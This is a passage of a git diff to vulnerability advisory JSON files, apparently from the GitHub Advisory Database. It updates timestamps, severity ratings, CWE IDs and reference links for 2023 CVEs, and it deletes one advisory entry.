+21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35794" }, + { + "type": "WEB", + "url": "https://blog.kscsc.online/cves/202335794/md.html" + }, { "type": "WEB", "url": "https://github.com/Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking" diff --git a/advisories/unreviewed/2023/10/GHSA-pj5c-qr29-6746/GHSA-pj5c-qr29-6746.json b/advisories/unreviewed/2023/10/GHSA-pj5c-qr29-6746/GHSA-pj5c-qr29-6746.json index c303a4735886e..51ae6dc73a8d6 100644 --- a/advisories/unreviewed/2023/10/GHSA-pj5c-qr29-6746/GHSA-pj5c-qr29-6746.json +++ b/advisories/unreviewed/2023/10/GHSA-pj5c-qr29-6746/GHSA-pj5c-qr29-6746.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html" } ], "database_specific": { 
diff --git a/advisories/unreviewed/2023/10/GHSA-pq6p-fc96-wc5w/GHSA-pq6p-fc96-wc5w.json b/advisories/unreviewed/2023/10/GHSA-pq6p-fc96-wc5w/GHSA-pq6p-fc96-wc5w.json index 862222ab7df42..f54bab29ed118 100644 --- a/advisories/unreviewed/2023/10/GHSA-pq6p-fc96-wc5w/GHSA-pq6p-fc96-wc5w.json +++ b/advisories/unreviewed/2023/10/GHSA-pq6p-fc96-wc5w/GHSA-pq6p-fc96-wc5w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pq6p-fc96-wc5w", - "modified": "2023-11-16T03:30:19Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-26T21:30:22Z", "aliases": [ "CVE-2023-46747" @@ -36,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-288" + "CWE-288", + "CWE-306" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2023/10/GHSA-q38f-wwqq-rr3v/GHSA-q38f-wwqq-rr3v.json b/advisories/unreviewed/2023/10/GHSA-q38f-wwqq-rr3v/GHSA-q38f-wwqq-rr3v.json index 3f2f071d6ef02..5feb67cfca35a 100644 --- a/advisories/unreviewed/2023/10/GHSA-q38f-wwqq-rr3v/GHSA-q38f-wwqq-rr3v.json +++ b/advisories/unreviewed/2023/10/GHSA-q38f-wwqq-rr3v/GHSA-q38f-wwqq-rr3v.json @@ -113,6 +113,10 @@ "type": "WEB", "url": "https://lists.x.org/archives/xorg-announce/2023-October/003430.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231130-0004/" diff --git a/advisories/unreviewed/2023/10/GHSA-r54v-c2hx-5x23/GHSA-r54v-c2hx-5x23.json b/advisories/unreviewed/2023/10/GHSA-r54v-c2hx-5x23/GHSA-r54v-c2hx-5x23.json index c31aeffcb72fb..02872f8045c27 100644 --- a/advisories/unreviewed/2023/10/GHSA-r54v-c2hx-5x23/GHSA-r54v-c2hx-5x23.json +++ b/advisories/unreviewed/2023/10/GHSA-r54v-c2hx-5x23/GHSA-r54v-c2hx-5x23.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" 
diff --git a/advisories/unreviewed/2023/10/GHSA-r6m2-cj32-wg84/GHSA-r6m2-cj32-wg84.json b/advisories/unreviewed/2023/10/GHSA-r6m2-cj32-wg84/GHSA-r6m2-cj32-wg84.json index 790005b0ac842..b2c7a155696ca 100644 --- a/advisories/unreviewed/2023/10/GHSA-r6m2-cj32-wg84/GHSA-r6m2-cj32-wg84.json +++ b/advisories/unreviewed/2023/10/GHSA-r6m2-cj32-wg84/GHSA-r6m2-cj32-wg84.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r6m2-cj32-wg84", - "modified": "2023-10-13T21:30:18Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-09T09:30:42Z", "aliases": [ "CVE-2023-39854" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-918" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-09T07:15:24Z" diff --git a/advisories/unreviewed/2023/10/GHSA-vrhp-3w5m-c3w6/GHSA-vrhp-3w5m-c3w6.json b/advisories/unreviewed/2023/10/GHSA-vrhp-3w5m-c3w6/GHSA-vrhp-3w5m-c3w6.json index 63f2507f26030..a3ea5b9a2d621 100644 --- a/advisories/unreviewed/2023/10/GHSA-vrhp-3w5m-c3w6/GHSA-vrhp-3w5m-c3w6.json +++ b/advisories/unreviewed/2023/10/GHSA-vrhp-3w5m-c3w6/GHSA-vrhp-3w5m-c3w6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vrhp-3w5m-c3w6", - "modified": "2023-10-19T00:30:18Z", + "modified": "2024-02-01T18:31:06Z", "published": "2023-10-16T09:30:19Z", "aliases": [ "CVE-2023-45629" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-16T09:15:10Z" diff --git a/advisories/unreviewed/2023/10/GHSA-vw96-6w82-f9ww/GHSA-vw96-6w82-f9ww.json b/advisories/unreviewed/2023/10/GHSA-vw96-6w82-f9ww/GHSA-vw96-6w82-f9ww.json index 87f3ac910367f..0c924f6d84416 100644 --- a/advisories/unreviewed/2023/10/GHSA-vw96-6w82-f9ww/GHSA-vw96-6w82-f9ww.json +++ b/advisories/unreviewed/2023/10/GHSA-vw96-6w82-f9ww/GHSA-vw96-6w82-f9ww.json 
@@ -45,6 +45,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-w228-frcg-5x99/GHSA-w228-frcg-5x99.json b/advisories/unreviewed/2023/10/GHSA-w228-frcg-5x99/GHSA-w228-frcg-5x99.json index d6cb05195e3ba..874af65e1011e 100644 --- a/advisories/unreviewed/2023/10/GHSA-w228-frcg-5x99/GHSA-w228-frcg-5x99.json +++ b/advisories/unreviewed/2023/10/GHSA-w228-frcg-5x99/GHSA-w228-frcg-5x99.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w228-frcg-5x99", - "modified": "2023-10-11T09:34:01Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-04T21:30:22Z", "aliases": [ "CVE-2023-5391" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-502" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-04T19:15:10Z" diff --git a/advisories/unreviewed/2023/10/GHSA-w5h3-rmvr-mgm6/GHSA-w5h3-rmvr-mgm6.json b/advisories/unreviewed/2023/10/GHSA-w5h3-rmvr-mgm6/GHSA-w5h3-rmvr-mgm6.json index 74f102243bdb5..ca6d51d6d3bb2 100644 --- a/advisories/unreviewed/2023/10/GHSA-w5h3-rmvr-mgm6/GHSA-w5h3-rmvr-mgm6.json +++ b/advisories/unreviewed/2023/10/GHSA-w5h3-rmvr-mgm6/GHSA-w5h3-rmvr-mgm6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w5h3-rmvr-mgm6", - "modified": "2023-10-25T18:32:21Z", + "modified": "2024-02-01T15:30:24Z", "published": "2023-10-25T18:32:21Z", "aliases": [ "CVE-2023-37283" @@ -34,7 +34,7 @@ "cwe_ids": [ "CWE-287" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-25T18:17:28Z" diff --git a/advisories/unreviewed/2023/10/GHSA-wqrm-w4fm-fmh8/GHSA-wqrm-w4fm-fmh8.json b/advisories/unreviewed/2023/10/GHSA-wqrm-w4fm-fmh8/GHSA-wqrm-w4fm-fmh8.json index cfad40209d56e..081521f5c05bd 100644 
--- a/advisories/unreviewed/2023/10/GHSA-wqrm-w4fm-fmh8/GHSA-wqrm-w4fm-fmh8.json +++ b/advisories/unreviewed/2023/10/GHSA-wqrm-w4fm-fmh8/GHSA-wqrm-w4fm-fmh8.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TDMQG42VVOZ5USSI4NSNT3VJPGBPNSIW/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5536" diff --git a/advisories/unreviewed/2023/10/GHSA-xm85-mgcm-6w3f/GHSA-xm85-mgcm-6w3f.json b/advisories/unreviewed/2023/10/GHSA-xm85-mgcm-6w3f/GHSA-xm85-mgcm-6w3f.json index 61875cef45b12..bc3100d309f92 100644 --- a/advisories/unreviewed/2023/10/GHSA-xm85-mgcm-6w3f/GHSA-xm85-mgcm-6w3f.json +++ b/advisories/unreviewed/2023/10/GHSA-xm85-mgcm-6w3f/GHSA-xm85-mgcm-6w3f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xm85-mgcm-6w3f", - "modified": "2023-10-13T21:30:21Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-10-13T21:30:21Z", "aliases": [ "CVE-2023-36559" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36559" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-13T21:15:51Z" diff --git a/advisories/unreviewed/2023/10/GHSA-xw78-pcr6-wrg8/GHSA-xw78-pcr6-wrg8.json b/advisories/unreviewed/2023/10/GHSA-xw78-pcr6-wrg8/GHSA-xw78-pcr6-wrg8.json index 7b699c6d2756d..b046074f10d28 100644 --- a/advisories/unreviewed/2023/10/GHSA-xw78-pcr6-wrg8/GHSA-xw78-pcr6-wrg8.json +++ b/advisories/unreviewed/2023/10/GHSA-xw78-pcr6-wrg8/GHSA-xw78-pcr6-wrg8.json 
@@ -33,6 +33,14 @@ "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231027-0010/" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0004/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5532" diff --git a/advisories/unreviewed/2023/11/GHSA-33qg-rqxq-9ghc/GHSA-33qg-rqxq-9ghc.json b/advisories/unreviewed/2023/11/GHSA-33qg-rqxq-9ghc/GHSA-33qg-rqxq-9ghc.json index aa7013301cbcb..6630bcecfa31a 100644 --- a/advisories/unreviewed/2023/11/GHSA-33qg-rqxq-9ghc/GHSA-33qg-rqxq-9ghc.json +++ b/advisories/unreviewed/2023/11/GHSA-33qg-rqxq-9ghc/GHSA-33qg-rqxq-9ghc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33qg-rqxq-9ghc", - "modified": "2023-11-22T21:31:07Z", + "modified": "2024-02-06T15:32:03Z", "published": "2023-11-22T21:31:07Z", "aliases": [ "CVE-2023-47781" diff --git a/advisories/unreviewed/2023/11/GHSA-35r7-vh9q-xpf7/GHSA-35r7-vh9q-xpf7.json b/advisories/unreviewed/2023/11/GHSA-35r7-vh9q-xpf7/GHSA-35r7-vh9q-xpf7.json index fe199331dacd0..09a09243a5345 100644 --- a/advisories/unreviewed/2023/11/GHSA-35r7-vh9q-xpf7/GHSA-35r7-vh9q-xpf7.json +++ b/advisories/unreviewed/2023/11/GHSA-35r7-vh9q-xpf7/GHSA-35r7-vh9q-xpf7.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5556" diff --git a/advisories/unreviewed/2023/11/GHSA-39vm-62wp-46hv/GHSA-39vm-62wp-46hv.json b/advisories/unreviewed/2023/11/GHSA-39vm-62wp-46hv/GHSA-39vm-62wp-46hv.json index e5565f17632a6..45f19c45ea0f1 100644 --- a/advisories/unreviewed/2023/11/GHSA-39vm-62wp-46hv/GHSA-39vm-62wp-46hv.json +++ b/advisories/unreviewed/2023/11/GHSA-39vm-62wp-46hv/GHSA-39vm-62wp-46hv.json 
@@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-4742-9c9c-4wf7/GHSA-4742-9c9c-4wf7.json b/advisories/unreviewed/2023/11/GHSA-4742-9c9c-4wf7/GHSA-4742-9c9c-4wf7.json index 5508d5a738dd3..239b4d6a424df 100644 --- a/advisories/unreviewed/2023/11/GHSA-4742-9c9c-4wf7/GHSA-4742-9c9c-4wf7.json +++ b/advisories/unreviewed/2023/11/GHSA-4742-9c9c-4wf7/GHSA-4742-9c9c-4wf7.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36029" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-47vw-3hx2-6877/GHSA-47vw-3hx2-6877.json b/advisories/unreviewed/2023/11/GHSA-47vw-3hx2-6877/GHSA-47vw-3hx2-6877.json index 20d39978aca5c..70485916aebe9 100644 --- a/advisories/unreviewed/2023/11/GHSA-47vw-3hx2-6877/GHSA-47vw-3hx2-6877.json +++ b/advisories/unreviewed/2023/11/GHSA-47vw-3hx2-6877/GHSA-47vw-3hx2-6877.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-4vx9-ghq5-84jw/GHSA-4vx9-ghq5-84jw.json b/advisories/unreviewed/2023/11/GHSA-4vx9-ghq5-84jw/GHSA-4vx9-ghq5-84jw.json index 79dd34bae4feb..a2fd7998a84d2 100644 --- a/advisories/unreviewed/2023/11/GHSA-4vx9-ghq5-84jw/GHSA-4vx9-ghq5-84jw.json +++ b/advisories/unreviewed/2023/11/GHSA-4vx9-ghq5-84jw/GHSA-4vx9-ghq5-84jw.json 
@@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-6jj9-4hh8-6xpv/GHSA-6jj9-4hh8-6xpv.json b/advisories/unreviewed/2023/11/GHSA-6jj9-4hh8-6xpv/GHSA-6jj9-4hh8-6xpv.json index 037c1abbec6a5..c723c392c6460 100644 --- a/advisories/unreviewed/2023/11/GHSA-6jj9-4hh8-6xpv/GHSA-6jj9-4hh8-6xpv.json +++ b/advisories/unreviewed/2023/11/GHSA-6jj9-4hh8-6xpv/GHSA-6jj9-4hh8-6xpv.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json b/advisories/unreviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json deleted file mode 100644 index 2a306655a9cc9..0000000000000 --- a/advisories/unreviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json +++ /dev/null 
@@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6mv8-95x5-xcq9", - "modified": "2023-11-16T18:30:31Z", - "published": "2023-11-16T18:30:31Z", - "aliases": [ - "CVE-2023-6038" - ], - "details": "An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6038" - }, - { - "type": "WEB", - "url": "https://huntr.com/bounties/380fce33-fec5-49d9-a101-12c972125d8c" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-29", - "CWE-862" - ], - "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-11-16T17:15:09Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/11/GHSA-6wwh-cvh6-jmg9/GHSA-6wwh-cvh6-jmg9.json b/advisories/unreviewed/2023/11/GHSA-6wwh-cvh6-jmg9/GHSA-6wwh-cvh6-jmg9.json index fbfd61fe0e980..e9f2e33511944 100644 --- a/advisories/unreviewed/2023/11/GHSA-6wwh-cvh6-jmg9/GHSA-6wwh-cvh6-jmg9.json +++ b/advisories/unreviewed/2023/11/GHSA-6wwh-cvh6-jmg9/GHSA-6wwh-cvh6-jmg9.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44324" }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/framemaker-publishing-server/apsb23-58.html" + }, { "type": "WEB", "url": "https://helpx.adobe.com/security/products/framemaker/apsb23-58.html" diff --git a/advisories/unreviewed/2023/11/GHSA-75mv-f5hh-c65h/GHSA-75mv-f5hh-c65h.json b/advisories/unreviewed/2023/11/GHSA-75mv-f5hh-c65h/GHSA-75mv-f5hh-c65h.json index 99d1f52d5b39f..1493b027ff31d 100644 --- a/advisories/unreviewed/2023/11/GHSA-75mv-f5hh-c65h/GHSA-75mv-f5hh-c65h.json +++ b/advisories/unreviewed/2023/11/GHSA-75mv-f5hh-c65h/GHSA-75mv-f5hh-c65h.json 
@@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-7cjp-92p9-vr97/GHSA-7cjp-92p9-vr97.json b/advisories/unreviewed/2023/11/GHSA-7cjp-92p9-vr97/GHSA-7cjp-92p9-vr97.json index 5bdf14248fd98..fe288637e1aa7 100644 --- a/advisories/unreviewed/2023/11/GHSA-7cjp-92p9-vr97/GHSA-7cjp-92p9-vr97.json +++ b/advisories/unreviewed/2023/11/GHSA-7cjp-92p9-vr97/GHSA-7cjp-92p9-vr97.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-7x7g-p6hc-7cp3/GHSA-7x7g-p6hc-7cp3.json b/advisories/unreviewed/2023/11/GHSA-7x7g-p6hc-7cp3/GHSA-7x7g-p6hc-7cp3.json index 072a594bf68ac..e7c04b28c7a4a 100644 --- a/advisories/unreviewed/2023/11/GHSA-7x7g-p6hc-7cp3/GHSA-7x7g-p6hc-7cp3.json +++ b/advisories/unreviewed/2023/11/GHSA-7x7g-p6hc-7cp3/GHSA-7x7g-p6hc-7cp3.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36034" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-98mf-83qw-2xg8/GHSA-98mf-83qw-2xg8.json b/advisories/unreviewed/2023/11/GHSA-98mf-83qw-2xg8/GHSA-98mf-83qw-2xg8.json index bfd20ca3fcb2c..628c13486238e 100644 --- a/advisories/unreviewed/2023/11/GHSA-98mf-83qw-2xg8/GHSA-98mf-83qw-2xg8.json +++ b/advisories/unreviewed/2023/11/GHSA-98mf-83qw-2xg8/GHSA-98mf-83qw-2xg8.json 
@@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36409" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-9jpv-w64v-mgr2/GHSA-9jpv-w64v-mgr2.json b/advisories/unreviewed/2023/11/GHSA-9jpv-w64v-mgr2/GHSA-9jpv-w64v-mgr2.json index c4c378e5b0d87..3e8a2489669c6 100644 --- a/advisories/unreviewed/2023/11/GHSA-9jpv-w64v-mgr2/GHSA-9jpv-w64v-mgr2.json +++ b/advisories/unreviewed/2023/11/GHSA-9jpv-w64v-mgr2/GHSA-9jpv-w64v-mgr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9jpv-w64v-mgr2", - "modified": "2023-11-28T12:31:25Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-11-02T09:30:18Z", "aliases": [ "CVE-2023-46595" diff --git a/advisories/unreviewed/2023/11/GHSA-c254-v996-g238/GHSA-c254-v996-g238.json b/advisories/unreviewed/2023/11/GHSA-c254-v996-g238/GHSA-c254-v996-g238.json index b86b7fd087110..5ffdb9ba359ee 100644 --- a/advisories/unreviewed/2023/11/GHSA-c254-v996-g238/GHSA-c254-v996-g238.json +++ b/advisories/unreviewed/2023/11/GHSA-c254-v996-g238/GHSA-c254-v996-g238.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36022" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-c46p-5pq2-qpcg/GHSA-c46p-5pq2-qpcg.json b/advisories/unreviewed/2023/11/GHSA-c46p-5pq2-qpcg/GHSA-c46p-5pq2-qpcg.json index ead2451864f08..9f2a54ac4529b 100644 --- a/advisories/unreviewed/2023/11/GHSA-c46p-5pq2-qpcg/GHSA-c46p-5pq2-qpcg.json +++ b/advisories/unreviewed/2023/11/GHSA-c46p-5pq2-qpcg/GHSA-c46p-5pq2-qpcg.json 
@@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-c8pp-vxj4-7mp3/GHSA-c8pp-vxj4-7mp3.json b/advisories/unreviewed/2023/11/GHSA-c8pp-vxj4-7mp3/GHSA-c8pp-vxj4-7mp3.json index ac3399f2465d1..fbb5cd1ce0be3 100644 --- a/advisories/unreviewed/2023/11/GHSA-c8pp-vxj4-7mp3/GHSA-c8pp-vxj4-7mp3.json +++ b/advisories/unreviewed/2023/11/GHSA-c8pp-vxj4-7mp3/GHSA-c8pp-vxj4-7mp3.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-fggx-frxq-cpx8/GHSA-fggx-frxq-cpx8.json b/advisories/unreviewed/2023/11/GHSA-fggx-frxq-cpx8/GHSA-fggx-frxq-cpx8.json index 8cdaada909153..a96c507b10086 100644 --- a/advisories/unreviewed/2023/11/GHSA-fggx-frxq-cpx8/GHSA-fggx-frxq-cpx8.json +++ b/advisories/unreviewed/2023/11/GHSA-fggx-frxq-cpx8/GHSA-fggx-frxq-cpx8.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5556" diff --git a/advisories/unreviewed/2023/11/GHSA-fq9v-vwjc-pv76/GHSA-fq9v-vwjc-pv76.json b/advisories/unreviewed/2023/11/GHSA-fq9v-vwjc-pv76/GHSA-fq9v-vwjc-pv76.json index 84d5d93f30a50..da478203c0988 100644 --- a/advisories/unreviewed/2023/11/GHSA-fq9v-vwjc-pv76/GHSA-fq9v-vwjc-pv76.json +++ b/advisories/unreviewed/2023/11/GHSA-fq9v-vwjc-pv76/GHSA-fq9v-vwjc-pv76.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fq9v-vwjc-pv76", - "modified": "2023-11-16T18:30:31Z", + "modified": "2024-02-08T18:30:38Z", "published": "2023-11-16T18:30:31Z", "aliases": [ "CVE-2023-6176" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfaa80c91f6f99b9342b6557f0f0e1143e434066" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-g35p-9423-7ww9/GHSA-g35p-9423-7ww9.json b/advisories/unreviewed/2023/11/GHSA-g35p-9423-7ww9/GHSA-g35p-9423-7ww9.json index d582e950b2062..9399d75dedb5c 100644 --- a/advisories/unreviewed/2023/11/GHSA-g35p-9423-7ww9/GHSA-g35p-9423-7ww9.json +++ b/advisories/unreviewed/2023/11/GHSA-g35p-9423-7ww9/GHSA-g35p-9423-7ww9.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-g9xm-mgr3-c2x8/GHSA-g9xm-mgr3-c2x8.json b/advisories/unreviewed/2023/11/GHSA-g9xm-mgr3-c2x8/GHSA-g9xm-mgr3-c2x8.json index 23b1de71a11e7..e8ca2848563ff 100644 --- a/advisories/unreviewed/2023/11/GHSA-g9xm-mgr3-c2x8/GHSA-g9xm-mgr3-c2x8.json +++ b/advisories/unreviewed/2023/11/GHSA-g9xm-mgr3-c2x8/GHSA-g9xm-mgr3-c2x8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g9xm-mgr3-c2x8", - "modified": "2023-11-21T18:30:26Z", + "modified": "2024-02-06T15:32:03Z", "published": "2023-11-14T00:30:19Z", "aliases": [ "CVE-2023-47673" diff --git a/advisories/unreviewed/2023/11/GHSA-gww9-w46q-2x34/GHSA-gww9-w46q-2x34.json b/advisories/unreviewed/2023/11/GHSA-gww9-w46q-2x34/GHSA-gww9-w46q-2x34.json index 08749b9899f3a..94888af1771f8 100644 
--- a/advisories/unreviewed/2023/11/GHSA-gww9-w46q-2x34/GHSA-gww9-w46q-2x34.json +++ b/advisories/unreviewed/2023/11/GHSA-gww9-w46q-2x34/GHSA-gww9-w46q-2x34.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-jvj3-gqjm-cg8p/GHSA-jvj3-gqjm-cg8p.json b/advisories/unreviewed/2023/11/GHSA-jvj3-gqjm-cg8p/GHSA-jvj3-gqjm-cg8p.json index 45530246a03e7..0892cc4903ac9 100644 --- a/advisories/unreviewed/2023/11/GHSA-jvj3-gqjm-cg8p/GHSA-jvj3-gqjm-cg8p.json +++ b/advisories/unreviewed/2023/11/GHSA-jvj3-gqjm-cg8p/GHSA-jvj3-gqjm-cg8p.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0451" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0533" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-5981" @@ -49,6 +53,10 @@ "type": "WEB", "url": "https://gnutls.org/security-new.html#GNUTLS-SA-2023-10-23" }, + { + "type": "WEB", + "url": 